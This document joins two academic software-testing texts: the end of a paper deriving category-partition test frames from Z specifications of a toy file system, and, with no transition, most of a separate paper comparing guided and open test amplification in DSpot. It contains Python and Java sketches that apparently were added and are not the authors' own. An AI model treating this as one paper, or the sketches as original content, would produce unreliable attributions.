This is an advantageous side effect of deriving test frames in this manner; deriving test data based on the functional specifications can lead the test engineer to identify anomalies in the specifications themselves. Another special value of type \( Name \), which we denote \( ROOT \), is the value of \( n? \) used when referring to the root directory. The special value \( ROOT \) corresponds to the empty string. The schema for CreateDir suggests two more categories. One is based on whether the current working directory (\( cwd \)) is the empty sequence (i.e., root). The empty sequence is a typical special case for sequences. The last category we employ is the state of the directories set (\( dirs \)). The motivation for this category is that if it matters whether \( cwd \) is the empty sequence (root), then it is relevant that \( cwd \) is necessarily root whenever the only existing directory is the root directory. The fourth step is partitioning the categories, some aspects of which have already been discussed. The test specifications for CreateDir after the first four steps of the category-partition method are:

---

**Functional Unit:** CreateDir

**Inputs:** \[ n? : Name \]

**Environment Variables:** \[ dirs : \mathbb{P}\, FullName \\ cwd : FullName \]

---

\(^2\)Since \( files \) is neither examined nor changed in CreateDir, \( files \) is not a relevant state variable to the operation. As a technical point, we could capture this fact by using the Z schema hiding operator to hide the variable \( files \) in the schema \( CreateDir\ Input\ Domain \), but we elect not to do so for the remainder of the example.

Categories:

Category - Precondition
- Choice 1 (Base): \( cwd \frown \langle n? \rangle \notin dirs \)
- Choice 2: \( cwd \frown \langle n? \rangle \in dirs \)

Category - Type of \( n? \)
- Choice 1 (Base): \( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \)
- Choice 2: \( n? = \text{ROOT} \)
- Choice 3: \( n?
= \text{PARENT} \)

Category - Type of \( cwd \)
- Choice 1 (Base): \( cwd \neq \langle\rangle \)
- Choice 2: \( cwd = \langle\rangle \)

Category - Type of \( dirs \)
- Choice 1 (Base): \( dirs \neq \{\langle\rangle\} \)
- Choice 2: \( dirs = \{\langle\rangle\} \)

5.3.1 Creating The Combination Matrix

The combination matrix is a conceptual tool; only those combinations of choices that are selected need be explicitly enumerated. The combination matrix for \( \text{CreateDir} \) has four dimensions, one for each category. There are \( 2 \times 3 \times 2 \times 2 = 24 \) entries in the combination matrix for \( \text{CreateDir} \).

5.3.2 Identifying The Base Test Frame

To identify a base test frame, a base choice is selected for each category. The normal case for \( \text{CreateDir} \) is the case where the directory to be created does not yet exist and is neither \( \text{ROOT} \) nor \( \text{PARENT} \), where the current working directory is not the \( \text{ROOT} \) directory, and where the directory set contains more than just the \( \text{ROOT} \) directory. Base choices are indicated by the word “Base” in the test specification for \( \text{CreateDir} \). For brevity, the choices in the test specification are listed as predicates only, although a more complete description is with a set of variable declarations and predicates on those variables, i.e., with a schema, as done by Stocks and Carrington [SC93a, SC93b]. Note that the invariant from \( \text{FileSystem} \), which describes the set of valid states for the file system, must hold for every choice. The base test frame is the intersection of the base choice for each category, and this is succinctly expressed with the schema conjunction of the base schema for each category. For \( \text{CreateDir} \) the base test frame is the schema:\(^3\)

\[
\text{CreateDir}_{\text{Base Test Frame}} \\
\text{FileSystem} \\
n? : \text{Name} \\
cwd \frown \langle n? \rangle \notin dirs \\
n?
\neq \text{ROOT} \land n? \neq \text{PARENT} \\
cwd \neq \langle\rangle \\
dirs \neq \{\langle\rangle\}
\]

The source of each of the explicitly listed predicates in \( \text{CreateDir}_{\text{Base Test Frame}} \) is as follows. The predicate \( cwd \frown \langle n? \rangle \notin dirs \) comes from the schema that is Choice 1 (Base) for Category - Precondition. Similarly, the predicate \( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \) comes from the schema that is Choice 1 (Base) for Category - Type of \( n? \), and so on.

5.3.3 Choosing Other Combinations

Applying the heuristic from section 4 to the \( \text{CreateDir} \) operation of **MiStix** gives a total of six test frame schemas: the base test frame schema (shown above in \( \text{CreateDir}_{\text{Base Test Frame}} \)) and five additional variations, one for each non-base choice. In the interest of compactness we omit the declaration part of the test frame schemas and only list the predicate parts from the choices. Note that since each test frame schema includes \( \text{FileSystem} \), each predicate part of a test frame schema listed below also includes the state invariant from \( \text{FileSystem} \), even though that predicate is not explicitly listed.\(^3\)

\(^3\)Note that the schema inclusion of \( \text{FileSystem} \) in \( \text{CreateDir}_{\text{Base Test Frame}} \) declares the variables \( dirs \) and \( cwd \) and supplies the state invariants on these variables.

Base Test Frame

Test Frame 1: The Base Test Frame schema, \( \text{CreateDir}_{\text{Base Test Frame}} \), is shown above.

Test Frame From Category - Precondition

Test Frame 2:
\( cwd \frown \langle n? \rangle \in dirs \land \)
\( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \land \)
\( cwd \neq \langle\rangle \land \)
\( dirs \neq \{\langle\rangle\} \)

Test Frames From Category - Type of \( n? \)

Test Frame 3:
\( cwd \frown \langle n? \rangle \notin dirs \land \)
\( n? = \text{ROOT} \land \)
\( cwd \neq \langle\rangle \land \)
\( dirs \neq \{\langle\rangle\} \)

Test Frame 4:
\( cwd \frown \langle n? \rangle \notin dirs \land \)
\( n? = \text{PARENT} \land \)
\( cwd \neq \langle\rangle \land \)
\( dirs \neq \{\langle\rangle\} \)

Test Frame From Category - Type of \( dirs \)

Test Frame 5:
\( cwd \frown \langle n? \rangle \notin dirs \land \)
\( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \land \)
\( cwd \neq \langle\rangle \land \)
\( dirs = \{\langle\rangle\} \)

Test Frame From Category - Type of \( cwd \)

Test Frame 6:
\( cwd \frown \langle n? \rangle \notin dirs \land \)
\( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \land \)
\( cwd = \langle\rangle \land \)
\( dirs \neq \{\langle\rangle\} \)

Note the source of each of the four explicitly listed predicates in a given test frame schema listed above. Predicates are mechanically derived as for those in \( \text{CreateDir}_{\text{Base Test Frame}} \). Specifically, each predicate is a choice from one of the four categories for \( \text{CreateDir} \). For any given test frame schema, one predicate corresponds to a non-base choice; the remaining predicates correspond to base choices.

5.3.4 Identifying Infeasible Combinations

Test Frame 5, developed above for \( \text{CreateDir} \), is, in fact, infeasible. The conjuncts

\( dirs = \{\langle\rangle\} \land cwd \neq \langle\rangle \)

along with the invariant relation from \( \text{FileSystem} \),

\( cwd \in dirs \)

simplify to \textit{false}. Informally, if the root directory is the only directory, then \( cwd \) must be set to the root directory.
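The infeasibility argument can also be checked mechanically. The following sketch (ours, not the paper's) brute-forces all states over a tiny universe of names and finds no state satisfying Test Frame 5's constraints together with the invariant; `files` is omitted since the frame does not constrain it:

```python
from itertools import chain, combinations, product

names = ["a", "b"]
# All full names (tuples of components) up to depth 2 over a tiny universe.
full_names = [()] + [tuple(p) for d in (1, 2) for p in product(names, repeat=d)]

def powerset(xs):
    return chain.from_iterable(combinations(xs, r) for r in range(len(xs) + 1))

def invariant(dirs, cwd):
    # every non-root directory has an existing parent, and cwd exists
    return all(f == () or f[:-1] in dirs for f in dirs) and cwd in dirs

# Test Frame 5: dirs = {<>} (root only) and cwd /= <>, plus the invariant.
feasible = [
    (set(ds), cwd)
    for ds in powerset(full_names)
    for cwd in full_names
    if set(ds) == {()} and cwd != () and invariant(set(ds), cwd)
]
assert feasible == []       # no state satisfies Test Frame 5
assert invariant({()}, ())  # the revised frame (cwd = <>) is satisfiable
```

This is exactly the kind of routine satisfiability check that, as noted in step 4 of the procedure, a tool could perform as an intelligent assistant to the test engineer.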
We demonstrate the utility of the combination matrix by showing the entries for the Type of \( dirs \) \( \times \) Type of \( cwd \) part of the combination matrix:

\[
\begin{array}{l|cc}
 & \text{Type of } dirs \text{: Base} & \text{Type of } dirs \text{: Root Only} \\
\hline
\text{Type of } cwd \text{: Base} & 1 & \\
\text{Type of } cwd \text{: Root} & 2 & 3 \\
\end{array}
\]

The empty cell represents the combination of choices for Test Frame 5, where there is only one directory, the root directory, and it contains no subdirectories (\( dirs = \{\langle\rangle\} \)), while the current working directory (\( cwd \)) is some non-root directory, e.g., /a. We revise Test Frame 5 by shifting to a different cell in the combination matrix, namely the cell labeled 3, where \( cwd \) is \( \text{ROOT} \). As a result, we get a revised Test Frame 5 (listed in full schema form):

\[
\text{CreateDir}_{\text{Revised Test Frame 5}} \\
\text{FileSystem} \\
n? : \text{Name} \\
cwd \frown \langle n? \rangle \notin dirs \\
n? \neq \text{ROOT} \land n? \neq \text{PARENT} \\
cwd = \langle\rangle \\
dirs = \{\langle\rangle\}
\]

5.3.5 Refining Test Frames Into Test Cases

Refining the test frames into test cases is the process of selecting a representative input from the set of inputs that satisfy the selected choices. In previous work such as DeMillo and Offutt [DO91], the refinement may be based purely on the syntax of the constraints and the types of the variables, whereas in a sophisticated system such as the one proposed by Wild et al. [WZFC92], such a refinement might be based on a knowledge base incorporating other project specific data. Since refinement is not the focus of our present work, we simply present sample test inputs that satisfy the necessary constraints. Each test input is a triple of \( (n?, dirs, cwd) \).
All Base Choices

Test Case 1: \( (b, \{\langle\rangle, \langle a \rangle\}, \langle a \rangle) \)

Non-Base Precondition Choice

Test Case 2: \( (b, \{\langle\rangle, \langle a \rangle, \langle a, b \rangle\}, \langle a \rangle) \)

Non-Base Type of \( n? \) Choice

Test Case 3: \( (\text{PARENT}, \{\langle\rangle, \langle a \rangle\}, \langle a \rangle) \)

Test Case 4: \( (\text{ROOT}, \{\langle\rangle, \langle a \rangle\}, \langle a \rangle) \)

Non-Base Type of \( dirs \) Choice

Test Case 5: \( (b, \{\langle\rangle\}, \langle\rangle) \)

Non-Base Type of \( cwd \) Choice

Test Case 6: \( (b, \{\langle\rangle, \langle a \rangle\}, \langle\rangle) \)

5.3.6 Writing Operation Commands

The actual test case commands must use the parameters specified by the values of the test cases in a syntactically correct command to the system being tested. This is a straightforward process that could be automated by using the formal specification of the command. For cell 1 in the above example, the operation is:

Operation: CreateDir b

5.3.7 Creating Test Scripts

A test script is derived from a matrix entry by taking the corresponding setup script, creating the syntax for the test operation, and appending the verify and cleanup scripts. A test script for cell 1 from the above matrix is:

- **Setup:** CreateDir a; ChangeDir a
- **Operation:** ...
- **Verify:** List
- **Cleanup:** Logoff

5.4 Results of Testing MiStix

To demonstrate the feasibility of our technique, we generated and executed a complete set of test data for the MiStix system. The implementation is about 900 lines of C source in three separate modules. We derived 72 test cases for the ten operations, of which 5 were duplicates. Some of the test cases were also superseded by others in the sense that they were prefixes of the other test cases. We did not eliminate these tests (although an automated tool to support this process could easily do so). The MiStix system contained 10 known faults, of which 7 were detected.
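The script assembly described in section 5.3.7 is mechanical; the following minimal sketch (ours, reusing the cell-1 commands from the example) concatenates the setup, operation, verify, and cleanup parts into one script:

```python
def make_script(setup, operation, verify="List", cleanup="Logoff"):
    """Assemble a test script: setup commands, the test operation,
    then the verify and cleanup commands, one command per line."""
    return "\n".join([*setup, operation, verify, cleanup])

# Test script for cell 1 of the Type of dirs x Type of cwd matrix.
script = make_script(setup=["CreateDir a", "ChangeDir a"],
                     operation="CreateDir b")
print(script)
```

As the paper notes, for many systems the verify and cleanup commands are constant, which is why they appear here as defaults rather than per-cell inputs.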
6 Conclusions

Test specifications are an important intermediate representation between functional specifications and functional tests. In general, it is desirable to know the extent to which a test specification can be derived from the functional specification and the extent to which the tester must rely on information external to the specification. In this paper we have helped to answer this question by presenting a procedure that will guide the tester when creating complete functional tests from functional specifications. It is unreasonable to expect to derive a test specification completely from the functional specifications. For example, the test engineer might know that programmers often make the mistake of using fixed-sized structures when dynamically-sized structures are required. In the specification for MiStix, the depth of the directory tree is not constrained by the Z specifications. The lack of an explicit statement makes it difficult to derive an appropriate category (e.g., directory tree depth). However, to a typical human test engineer, limits on directory depth are a relatively obvious property to check (and indeed such a check can lead to tests that discover faults not found by the generated test specification). Thus the role of mechanically generated test specifications as identified here is to relieve the burden of routine tasks and free the test engineer to concentrate on more creative tasks. Previous category-partition papers have offered relatively little guidance as to which combinations of choices should be tested. In this paper we have defined the base-choice coverage criterion, and demonstrated the feasibility of applying the criterion to an example specification. Some choices are designated as "base" choices. A base test frame uses all the base choices. Other test frames are generated by systematic enumeration over all non-base choices.
This technique is relatively inexpensive (linear in the number of choices) and ensures that each choice will be used in at least one test case (if feasible). In future work we intend to investigate the feasibility of the base-choice coverage criterion for categories derived from other sources than those investigated here. Acknowledgements It is a pleasure to acknowledge Tom Ostrand for his helpful comments and encouragement on the application of formal methods to category-partition testing. We are also grateful to Steve Zeil for explaining the utility of Z schemas as test frame descriptors. References
When to Let the Developer Guide: Trade-offs Between Open and Guided Test Amplification

Carolin Brandt, Danyao Wang, Andy Zaidman
Delft University of Technology
c.e.brandt@tudelft.nl, wangdanyaoa@gmail.com, a.e.zaidman@tudelft.nl

Abstract—Test amplification generates new tests by mutating existing, developer-written tests and keeping those tests that improve the coverage of the test suite. Current amplification tools focus on starting from a specific test and propose coverage improvements all over a software project, requiring considerable effort from the software engineer to understand and evaluate the different tests when deciding whether to include a test in the maintained test suite. In this paper, we propose a novel approach that lets the developer take charge and guide the test amplification process towards a specific branch they would like to test in a control flow graph visualization. We evaluate whether simple modifications to the automatic process that incorporate the guidance make the test amplification more effective at covering targeted branches. In a user study and semi-structured interviews we compare our user-guided test amplification approach to the state-of-the-art open test amplification approach. While our participants prefer the guided approach, we uncover several trade-offs that influence which approach is the better choice, largely depending on the use case of the developer.

Index Terms—Software Testing, Test Amplification, Automated Test Code Modification, User-centric Design, Human-Automation Interaction

I. INTRODUCTION

Software testing is one of the central activities in the software development lifecycle [1]. One part of this is developer tests, i.e., small automated programs that software developers write to check that their code behaves as they intend and to prevent it from breaking in the future [2]. While developer testing is widely seen as valuable, it is also a tedious and time-consuming activity [3].
One automated approach to relieve developers of this manual effort is test amplification. Test amplification mutates existing, developer-written tests to explore new behavior of the code under test [4]. Previous studies have shown that it can provide valuable tests to developers [5]–[7], but at the cost of long runtimes [5], [7] and effort for the developers to understand the behavior and impact of the amplified tests [7]–[9]. Let us illustrate this with an example: Masha, a software developer, is working on a new feature of her software project that requires small changes in her existing code. Before submitting a patch, she needs tests that cover all her new code, so she decides to use test amplification to generate them automatically. She picks an existing test from the class she worked on and asks the tool to create new tests based on it. After a while the tool reports back and proposes several tests to her. Unfortunately, the class did not have a high test coverage, so she has to sift through quite a few tests, spending time to understand what code they cover, only to realize it is not the code she is concerned with. Even for the tests that target her code, she has to switch between several methods under test and every time recall what behavior each method should have, so she can judge whether the generated test is correct. Our hypothesis is that these understandability issues are in part rooted in the disconnect between the present point of interest of a developer in the code base and the dispersed coverage contributions amplified tests are providing, i.e., developers need to rebuild the task context [10]. To bridge this disconnect, we propose to involve the software developer more tightly in the test amplification process. Ideally, they can convey which piece of code they are interested in testing, and the test amplification then presents only those tests that are relevant for the focus of the developer.
In this paper, we propose a novel approach of user-guided test amplification. Starting from a method in their code base, the developer can initiate the test amplification and choose, in a visualized control-flow graph, which branch of the method should be tested. The test amplification is then directed to call this method specifically, and generates a variety of tests for it. It measures the tests’ branch coverage and presents all tests that cover the intended branch to the developer, using the same control-flow graph visualization to help the developer understand how the test executes the method under test. We conduct a technical case study and a user study to understand the impact and potential use of user-guided test amplification.¹ In both studies we compare it to the existing test amplification approach [6], [7], which we will call open test amplification for a clearer distinction. With our technical case study on 31 classes from two open source projects, we investigate whether our simple changes in the guided amplification process are indeed effective at producing a higher ratio of tests for the targeted branch, and whether the guidance enables us to cover more branches overall in a project. Our findings from this study answer our first research question:

RQ1: How effectively does guided test amplification generate tests for targeted branches (compared to open test amplification)?

In our user study, 12 developers apply both approaches to two classes and we interview them about their experiences. From this, we learn how they perceive each technique and their considerations when comparing them to each other. Our observations address our second research question:

RQ2: How do developers perceive guided test amplification (compared to open test amplification)?

¹We follow the empirical standard for engineering research: https://acmsigsoft.github.io/EmpiricalStandards/docs/?standard=EngineeringResearch
Our two evaluation studies show that user-guided test amplification does deliver on the intended goals of making the test amplification process more effective and the coverage of the amplified tests easier to understand. However, the studies also show that the user-guided version of test amplification is not always better. From the participants' explanations during the interviews we learned that user-guided test amplification is closer to the real-life process of developing and testing new code, where the developer focuses on a specific feature, writing code and tests for it. On the other hand, open test amplification is better suited when the focus is on improving the test suite for an already existing code base, as it connects new tests more clearly to the already existing tests. This is one example of the trade-offs between open and user-guided test amplification that our studies make apparent. We discuss all trade-offs we encountered to help the reader understand the strengths and weaknesses of both approaches, and to help developers choose the approach that best fits their goals and workflow.

II. TEST AMPLIFICATION

In this section, we introduce the concept of (open) test amplification, which is realized in the state-of-the-art test amplification tool for Java called DSpot [7]. The aim of test amplification is to generate new tests by leveraging the knowledge in existing, human-written tests [4]. These new tests improve the existing test suite with respect to a defined engineering goal, e.g., structural coverage or mutation score. Our work is based on Brandt and Zaidman's proposal of developer-centric test amplification, which focuses on generating short and easy-to-understand tests to be included in the developer's maintained code base [7]. A central part of Brandt and Zaidman's proposal is to combine the automatic test amplification with a test exploration tool that guides the developer's interaction with the test amplification. Fig.
1 illustrates the workflow with their prototype in the form of an IDE plugin.

**Fig. 1:** Interaction with Brandt and Zaidman's test exploration IDE plugin for open test amplification [7].

The plugin runs the amplification in the background, relates the amplified tests to the existing test suite and presents them to the developer.

III. USER-GUIDED TEST AMPLIFICATION

The developer starts by selecting a method in the code under test which they would like to test (see (1) in Fig. 2). Then, the test exploration tool presents them with a control flow graph of that method, similar to the graph shown at (2). The graph shows the execution structure of the method through boxes for each statement and condition, connected with arrows. The arrows annotated with "True" or "False" represent branches in the control flow of the method, letting the developer see the different scenarios that might need testing. We compute the existing test coverage for the method and highlight the branches that are already covered in green, and those that are not covered in red. The developer can select the branch that they would like to cover and start the test amplification. The tool automatically looks for the corresponding test class and picks the first, often simplest, test as the original test for the amplification. If no corresponding test class or test can be found, the tool prompts the user to create a test and invoke the amplification again. When inspecting the results, the test exploration tool reuses the same control flow graph to show the developer the additional coverage that the amplified test provides (see (3)). The developer can then decide whether to add the test to the test suite, continue exploring the other tests, or invoke the tool again for other branches.

We add two simple modifications to the underlying automated test amplification process to incorporate the guidance provided by the developer. The lower half of Fig. 3 illustrates the modifications we make to the open test amplification process.
As the first modification to the input of the original test, we call the method selected by the developer with randomly generated values for the parameters. When an object is needed, DSpot looks for a public constructor and uses it with random values to initialize the object. Then we continue by randomly mutating the test input as with open test amplification. All produced tests that cover the branch selected by the developer are selected as results to be presented to the developer. We intentionally make simple modifications and largely rely on the amplification operators available in the base tool DSpot, e.g., the random generation of parameter values for object initialization. Our aim is to see whether such simple changes can already be effective at improving test amplification before considering more complex and runtime-impacting alternatives.

IV. EVALUATION

To evaluate our proposed user-guided test amplification, we conduct two comparative studies: a technical case study and a user study. Our first goal is to judge the effectiveness of our technical changes to the test amplification process: does the guidance lead to a larger proportion of the generated tests covering the targeted branch compared to using open test amplification (RQ1)? The second goal is to elicit the opinions of developers on interacting with user-guided and open test amplification (RQ2).

RQ1: How effectively does guided test amplification generate tests for targeted branches (compared to open test amplification)?

RQ2: How do developers perceive guided test amplification (compared to open test amplification)?

To answer RQ1 we conduct a technical case study, where we apply both approaches to generate tests for 100 branches sampled from 31 classes of two open source projects. We analyze the ratio of amplified tests fulfilling our coverage goals to determine which approach is more effective.
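For concreteness, the guided modification under evaluation — prepending a call to the developer-selected method with randomly generated arguments and keeping only branch-covering candidates — can be sketched as follows. All names here are hypothetical and this is a simplification, not DSpot's actual API.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Random;

// Hypothetical method under test; the developer selected the
// "False" branch of the guard in clamp() as the coverage target.
class Range {
    public int clamp(int v, int max) {
        return (v > max) ? max : v;
    }
}

public class GuidedAmplificationSketch {
    // Did the call take the targeted "False" branch of (v > max)?
    static boolean coversTargetBranch(int v, int max) {
        return !(v > max);
    }

    // Generate up to `limit` candidate argument pairs, execute the
    // prepended call, and keep only candidates covering the target
    // branch, mimicking how the guided amplification filters the
    // produced tests before presenting them to the developer.
    static List<int[]> amplify(long seed, int limit) {
        Random rng = new Random(seed);
        List<int[]> kept = new ArrayList<>();
        for (int i = 0; i < limit; i++) {
            int v = rng.nextInt(100);
            int max = rng.nextInt(100);
            new Range().clamp(v, max); // the prepended direct call
            if (coversTargetBranch(v, max)) {
                kept.add(new int[] { v, max });
            }
        }
        return kept;
    }

    public static void main(String[] args) {
        List<int[]> kept = amplify(42L, 200);
        System.out.println("kept " + kept.size() + " of 200 candidates");
    }
}
```

The 200-candidate limit mirrors the per-run cap used in the case study; the branch check here is hard-coded, whereas the real tool measures branch coverage of the executed tests.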
To answer RQ2 we perform a user study with 12 developers who apply both open and guided test amplification to test two classes. We then interview each participant to elicit their impression of each approach and how the approaches compare to each other.

A. Design Technical Case Study

In our technical case study, we sample code branches from two open source projects and apply both guided and open test amplification to try to cover them. We measure how many branches can be covered at all by each approach, and what percentage of the amplified tests generated in one run cover the targeted branch. We select two open source projects as study objects: Javapoet², a library to generate Java source files, and Stream-lib³, a library for summarizing data in streams. An important selection criterion was the traceability from code to tests: in both projects we can identify the matching test class for a class, because they adhere to consistent naming conventions. To select the targeted methods under test, we pick all classes with a clearly identified test class and from these classes select all public, non-static and non-abstract methods, which are the methods that can be called by DSpot's amplification operators. Taking all branches from the selected methods under test (160 from Javapoet, 264 from Stream-lib), we randomly sampled 100 branches per project. From the matching test class, we take the first test as the original test method for the amplification. We run both guided and open test amplification for each of the sampled branches, limiting the number of produced tests to 200 per run. Next, we collect all resulting tests as well as their coverage information. Per project, we calculate the ratio of covered branches over the sampled branches (Equation (1)).

\[ \text{ratio covered branches} = \frac{\# \text{ branches covered}}{\# \text{ branches sampled}} \] (1)

We calculate for each approach per project the average ratio of successful tests (Equation (2)) over all runs.
The ratio of successful tests captures how many of the returned amplified tests indeed cover the targeted branch.

\[ \text{ratio successful tests} = \frac{\# \text{ tests covering branch}}{\# \text{ tests returned}} \] (2)

B. Results Technical Case Study

Table I shows the calculated effectiveness of guided and open test amplification in comparison. We see that the guided test amplification can cover more branches in both projects, but the difference is small, and neither approach can cover more than 41% of the sampled branches. This shows that guiding the test amplification by explicitly calling the method that contains the targeted branch is only marginally helpful in covering a larger variety of branches of a project.

### Table I: Ratio of covered branches over sampled branches (see Equation (1)).

|                            | Javapoet | Stream-lib |
|----------------------------|----------|------------|
| Open Test Amplification    | 23%      | 35%        |
| Guided Test Amplification  | 32%      | 41%        |

To understand why many branches could not be covered by either test amplification approach, we manually inspected the branches that could not be covered. A core reason for not covering a branch was that the objects under test or the target method parameters were not initialized with the right values. In some cases, this came from the amplification tool not supporting the parameter's type, e.g., for a class without a public constructor. In such cases, the tool sets the parameters to null or empty values, which leads to exceptions when trying to generate assertions. We saw that Javapoet's classes have more methods whose parameter types are classes without public constructors, while Stream-lib mostly works with simple data types for the parameters. As the amplification tool's implementation does not support initializing classes without public constructors, this could explain why the amplification is more effective on Stream-lib than on Javapoet.
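The constructor issue can be illustrated with a small, self-contained sketch (hypothetical types, not from the study projects, and a simplification rather than DSpot's actual initialization code): a random initializer that only knows how to call public constructors falls back to null when a class offers none.

```java
import java.lang.reflect.Constructor;

// Hypothetical class without a public constructor.
class Widget {
    private Widget() {}
    public static Widget create() { return new Widget(); }
}

public class InitializationSketch {
    // Simplified stand-in for an amplification tool's object
    // initialization: it can only use public no-arg constructors.
    static Object randomInstance(Class<?> type) {
        for (Constructor<?> ctor : type.getConstructors()) { // public only
            if (ctor.getParameterCount() == 0) {
                try {
                    return ctor.newInstance();
                } catch (ReflectiveOperationException e) {
                    return null;
                }
            }
        }
        // No usable constructor: fall back to null, which later breaks
        // assertion generation for tests that need this object.
        return null;
    }

    public static void main(String[] args) {
        System.out.println(randomInstance(Widget.class) == null); // true
        System.out.println(randomInstance(Object.class) == null); // false
    }
}
```

`Class.getConstructors()` returns only public constructors, so `Widget` yields none and the initializer degrades to null — mirroring the exceptions observed during assertion generation in the study.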
Similarly, generating tests for faults or locations that require complex input objects is challenging for search-based tools like EvoSuite [11]. We investigated whether the choice of the original test impacts the ability to cover a certain branch. For this, we sampled ten branches that were covered neither by the amplification nor by the existing test suites. Then, we amplified all tests in the corresponding test class, but still could not generate tests that cover the sampled branches. This shows that selecting different initial tests likely does not impact how effective the test amplification is at covering the sampled branches. The likely cause mentioned earlier, not being able to generate the right initialization for the objects under test, is apparently not resolved by selecting different initial tests.

²https://github.com/square/javapoet
³https://github.com/addthis/stream-lib

Table II shows how many of the tests generated in one run of guided and open test amplification cover the targeted branch. While the ratio of tests that successfully cover the targeted branch with open test amplification is only 24% for Javapoet and 45% for Stream-lib, for guided test amplification this ratio is 70% for both projects. These results show that the guided test amplification is substantially more likely to produce tests that cover the targeted branch. This indicates that the simple guidance we implemented into the guided test amplification, calling the method containing the targeted branch, is indeed effective at steering the test amplification towards our target. Therefore, using guided test amplification enables us to configure the amplification to generate fewer tests, while still having a good chance of receiving a test that covers the targeted branch.

### Table II: Average ratio of successful tests, i.e., tests that cover the targeted branch (see Equation (2)).
|                            | Javapoet | Stream-lib |
|----------------------------|----------|------------|
| Open Test Amplification    | 24%      | 45%        |
| Guided Test Amplification  | 70%      | 70%        |

Looking at how the ratio of successful tests is distributed over the sampled, targeted branches (Fig. 4), we see clear differences between the projects. While in Javapoet the distributions are dense and the higher effectiveness of guided test amplification is clearly visible, for the Stream-lib project the ratio of tests successfully covering the targeted branch varies much more from branch to branch. One possible explanation for this difference is that the number of methods in Javapoet's classes is higher than in Stream-lib's. This means that Javapoet benefits more from the modification in guided test amplification that explicitly calls the method under test before the further input mutation.

### C. Answer to RQ1: How effectively does guided test amplification generate tests for targeted branches (compared to open test amplification)?

Summarizing the results of our technical case study, we can see that **guided test amplification is more effective than open test amplification** when covering a specific targeted branch. However, both approaches fail to cover the majority of the sampled branches, and depending on the project there can be large variation in the ratio of generated tests covering the targeted branch for both approaches. We will discuss and interpret these observations together with the insights from our user study in Section V.

### D. Design User Study

Our central ideas for guided test amplification were motivated by the interaction with the user: the developer initiates the test amplification and guides it towards a method and branch, reducing the search space for new tests.
In addition, this should help the developer understand and review the generated tests, because they have already built up the necessary mental task context of the method under test [10]. To elicit the opinions of developers on the use of guided test amplification in comparison to open test amplification, we conduct a user study. The user study starts with a questionnaire collecting demographic information and informed consent from each participant. Then, the participants are introduced to the concept of test amplification and asked to generate tests for two classes of similar complexity taken from the open source project Stream-lib. Each developer applies both open and guided test amplification, and we balance the order of the approaches and which class they test equally across the four groups in Table III. After the participant has solved both tasks, we conduct a semi-structured interview. Guided by a list of closed questions (see Figs. 5 and 6), we ask the participants to reflect on their experience with the open and guided test amplification, to compare both approaches and to express their overall impression of the amplified tests. We conducted the study fully remotely in sessions of 60 to 90 minutes. We recruited 12 participants through convenience sampling in our professional networks and on social media. The complete tasks and questionnaires can be found in our online appendix [12]. Our study design was approved by our local ethics review board.

### E. Results User Study

From the demographic questionnaire, we learn that we have a relatively young population of 12 participants with a development experience of one to three years (7), four to six years (4) and seven to nine years (1). Two of the participants had used an automatic test generation tool before. Their main programming languages were Python (6), Java (4), or C++ (3), and they mainly identified as working in general software development (4), research (2) or data and analytics (2).
1) Guided Test Amplification: Looking at the feedback regarding the guided test amplification, presented in Fig. 5, the participants strongly agree that the control flow graph showing the coverage of the target method is easy to understand (Q1). When asked whether the information provided is valuable, the participants strongly agree (Q2) and point out that the primary value is in visualizing the code structure and coverage, especially when the complexity of the method under test is high. Question Q3 centers on whether the control flow graph effectively lets the participants convey their expectation of what to cover to the amplification. On average the participants agree with this, pointing out that it also helps identify all scenarios that are possible when calling the method under test. They agree that the same visualization is also easy to understand when it comes to showing the coverage of an amplified test (Q4), and helps to select which amplified test to keep and add to the test suite (Q5). In this selection process, the visualization was especially helpful when the amplified tests provided diverse coverage contributions in methods with many branching points. Two participants were neutral about using the control flow graph to select a test, pointing out that they only want to cover the previously selected branch and would rather focus on the code of the amplified test when selecting, or add the test without further inspection.

2) Open Test Amplification: When it comes to the open test amplification, our study participants are more divided, but on average agree that the text-based instruction coverage explanation is easy to understand (Q6, Q7) and provides useful information (Q8). The main complaints were that listing each occurrence of new instruction coverage was too detailed and that the connection between the text and the covered instructions was not clear even with the provided hyperlinks.
The participants who were positive found the class and method names informative and liked that the hyperlinks let them locate the code under test conveniently. We asked whether the provided information about the amplification mutations in the test (Q9) and the additional coverage (Q10) helped the developers select which test to keep. The participants on average agreed that the additional coverage is helpful for selecting which test to keep (Q10). However, they criticized that they could not see the existing coverage to judge whether a line in the code under test is already covered or not. One participant also thought out loud about whether the provided coverage is actually important coverage.

3) Both Approaches Compared: After discussing each amplification approach separately with our participants, we asked several questions to compare both approaches (see Fig. 6). Directly asked whether the instruction coverage of open test amplification or the branch coverage of guided test amplification is easier to understand, all participants prefer the branch coverage (Q13). The participants found it easier to map the branch coverage to the source code structure. Some were also not familiar with the concept of instruction coverage and struggled to identify the individual instructions in a line of code. Most participants prefer the visualized control flow graph over representing coverage as highlights in the editor (Q14). Using the visualization, they did not need to read the source code of the method under test. We asked the developers to reflect on which approach helps them more during test generation (Q16), and they were divided between the two approaches. Seven participants prefer the guided test amplification as it is closer to writing tests in real-life scenarios, where they focus on specific features to cover.
Two participants prefer open test amplification: one proposes to use it early in the test creation process to cover as much code as possible, the other focuses on connecting a new test with the existing ones it is based on, which is clearer during open test amplification. Three participants were neutral and voted to combine the two approaches: when they do not have a specific coverage goal they would use open test amplification, while they would choose the guided test amplification when they aim for more control over each test's coverage. Regarding selecting which resulting test to incorporate into the test suite, the participants mainly prefer the guided test amplification (Q15). The ten participants voting for guided test amplification mention that when writing tests they usually have a specific feature in the code they want to cover, which they can achieve by guiding the test amplification. One participant prefers open test amplification as they focus on covering the whole project as much as possible and want to compare the different tests based on their total contributed coverage. One participant is neutral and would use both approaches depending on the situation. Finally, we asked about their overall impression of the amplified tests, which was positive (Q11, Fig. 5). The participants on average strongly agree that they would use test amplification again (Q12) and gave a variety of suggestions on how to improve the tools for both test amplification approaches. One aspect they noted positively is that the tool clearly indicates when it could not generate a test for a selected branch, which made these situations less negative in the participants' opinion.

F. Answer to RQ2: How do developers perceive guided test amplification (compared to open test amplification)?
